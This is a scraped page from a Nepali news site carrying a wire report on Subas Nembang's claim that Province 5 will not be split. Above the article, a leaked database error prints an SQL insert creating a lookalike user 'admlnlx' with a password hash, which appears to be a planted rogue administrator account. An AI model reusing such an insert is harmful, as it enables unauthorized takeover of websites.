WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCd/766Uuhklb8WhY.F2hZorUdd0eW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 20:57:39', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
प्रदेशहरु टुक्रयाउने खेल भइरहेको आरोप – Gaule Khabar

प्रदेशहरु टुक्रयाउने खेल भइरहेको आरोप

प्रदेशहरु टुक्रयाउने खेल भइरहेको आरोप

सोलुखुम्बु, मंसिर २१ –

नेकपा९एमाले० संसदीय दलका उपनेता सुवास नेम्वाङले कुनै पनि हालतमा प्रदेश नं ५ नटुक्रने बताउनुभएको छ ।

संविधान कार्यान्वयनका लागि चारमहिने जनपरिचालन अभियानको आज यहाँ उद्घाटन गर्दै नेता नेम्बाङले अहिले प्रदेश नं ५ बाट मधेस अलग गराउने विधेयक आएको र पछि प्रदेश– १ बाट झापा, मोरङ र सुनसरी तथा पश्चिममा कैलाली–कञ्चनपुर टुक्र्याउने र अन्त्यमा तराई र पहाड पूरै अलग गराएर नेपालको समृद्धिमा ठेस पु¥याउने खेल भइरहेको विचार व्यक्त गर्नुभयो ।

मधेसकेन्द्रित दलको मागमा त्यहाँका नागरिकको सहमति नभई सीमित स्वार्थी नेताको मात्र भएको बताउँदै पूर्वसभामुख नेम्वाङले यसमा नेपाली काँग्रेस तथा नेकपा९माओवादी केन्द्र० पनि लागिपरेको देख्दा आफूलाई अचम्म लागेको बताउनुभयो । उहाँले भन्नुभयो–“अहिले नयाँ संविधान कार्यान्वयनको विकल्प छैन।”

नेता नेम्वाङले तराई– मधेस, पहाड र हिमाल सबै मिलाएर नेपाललाई समुन्नत दिशामा अघि बढाउने काम एमालेको नेतृत्वमा मात्रै सम्भव हुने जिकिर गर्नुभयो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका